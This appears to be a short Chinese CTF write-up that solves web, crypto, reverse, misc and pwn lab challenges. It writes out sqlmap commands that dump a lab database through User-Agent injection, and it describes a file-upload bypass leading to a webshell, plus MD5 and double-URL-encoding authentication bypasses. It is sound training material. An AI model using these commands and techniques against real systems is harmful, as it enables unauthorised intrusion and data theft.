Web
Web_SINGIN
查看源代码,找到一串base64编码
得到flag
简简单单的文件上传
上传一个.jpg文件并抓包修改后缀,重放显示content-type为image/haha
修改content-type,再次重放发现上传成功
蚁剑测试连接成功
找到flag
好玩的PHP
发现有一个md5绕过,下面要求c=d,并且可以读取flag.php
用hackbar进行url构造
查看源代码找到flag
渗透的本质
题目带有一个附件
搜素发现dirsearch能扫描字典,发现/index.phps不同
访问后得到一串代码
可以从第二句if看出当id=admin时显示flag,再看前面会发现二者直接相等时会输出not allowed并退出
搜索发现这句意思是进行一次URL解码,在网页上输入网址位置时也会进行一次URL解码,也就是进行两次,所以说url解码 + url解码 = admin,用bp对admin进行两次编码
使用bp编码工具进行二次编码
最后使用hackbar构造URL得到flag
简简单单的sql
发现login.php
访问后找到注入点
sqlmap -u http://172.16.17.6:8304/login.php --level 3 --dbs --batch
用sqlmap自动爆数据库
发现是UA注入
得到5个数据库名
接下来爆表名
sqlmap -u http://172.16.17.6:8304/login.php --level 3 -D challenges --tables --batch
然后爆列名
sqlmap -u http://172.16.17.6:8304/login.php --level 3 -D challenges -T user_agents --columns --batch
最后爆字段
sqlmap -u http://172.16.17.6:8304/login.php --level 3 -D challenges -T user_agents -C user_agent --dump --batch
得到flag
Crypto
Crypto_Singin
搜索发现是unicode编码
查找发现解出来的这串是16进制编码
得到另外一串编码
得到base64编码
解码后得到flag
easy_rsa
打开发现已知n,c,e,求m
在网上找到脚本
分解n,网站如下
下载Crypto.Util.number库:GitHub - Legrandin/pycryptodome: A self-contained cryptographic library for Python
配置所需要的库
接下来可以在vscode上安装
pip --default-timeout=100 install pycryptodome
安装成功
用脚本跑出flag
Reverse
babyre
先用detect it easy 打开查看,发现是32位
用ida打开
在Hex View-1中找到flag
Misc
easy_singin
根据题目提示直接解码获得flag
Xjpg
在虚拟机中安装F5-steganography和JDK
直接执行命令java Extract 图片的绝对路径.jpg就可解密图片
安装F5-steganography和使用,及解决java环境版本报错问题-CSDN博客
流量分析1
先用wireshark打开并导出http
发现里面有一个压缩包
解压后得到六个文件
查看每一个文件,在1和6中发现png的文件头和文件尾,说明能组成一张图片
用010导入16进制文件,并保存
得到一张二维码图片
解码后得到flag
Pwn
pwn_Sing
直接在kali中nc连接可得到flag
先连接,然后用ls /查看,最后cat得到flag